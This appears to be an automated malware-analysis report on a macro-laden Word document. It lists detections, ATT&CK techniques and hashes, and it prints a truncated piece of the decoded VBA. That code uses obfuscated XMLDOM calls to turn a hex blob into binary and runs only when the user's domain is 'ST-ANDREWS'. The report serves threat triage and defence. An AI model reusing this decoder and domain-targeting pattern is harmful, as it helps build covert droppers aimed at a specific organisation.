MALICIOUS
Risk Score: 200
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1505.003 Server Software Component: Exploit Public-Facing Application
- T1204.002 Malicious File: User Execution (Office Application)
The sample is an OOXML document containing VBA macros. The VBA script uses `CreateObject` and `Environ` calls and attempts to deserialize a hex-encoded string into a .NET object. The payload appears to be designed for remote code execution, likely abusing .NET deserialization. The script only runs when the user's domain is 'ST-ANDREWS'.
Heuristics (7)
- ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): document contains a VBA project; VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ)
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
- External hyperlinks (1) (low, OOXML_EXTERNAL_HYPERLINKS): document contains 1 external hyperlink; clickable URLs are stored as external relationships. First target: https://www.st-andrews.ac.uk/coronavirus/
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URLs (OOXML schema namespace URIs found in the document body omitted):
  - https://www.st-andrews.ac.uk/coronavirus/ (document hyperlink)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 28045 bytes |

SHA-256: 5d6fd95392bb1d7b9ec3ed3605149e93d9c5e3e3eb6365faad101c9d7b345b32
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 77 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "InkPicture1, 0, 0, MSINKAUTLib, InkPicture"
Private Function prepareForm(hex)
On Error Resume Next
Dim DM, EL
Set DM = CreateObject("Mi" & "crosoft.X" & "MLD" & "OM")
Set EL = DM.createElement("t" & "mp")
EL.DataType = "bi" & "n.h" & "ex"
EL.Text = hex
prepareForm = EL.NodeTypedValue
End Function
Function FillForm()
On Error Resume Next
If Environ("USERDOMAIN") <> "ST-ANDREWS" Then
Exit Function
End If
Dim s As String
... (truncated)
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 59392 bytes |

SHA-256: 5b1ceeec8e6ef2f56d462a11e80e01def8dbcaf595bd50c9c216b0f9898f42fc
Detection:
- ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1
- Obfuscation or payload: likely (carved artifact contains 78 long base64-like blob(s))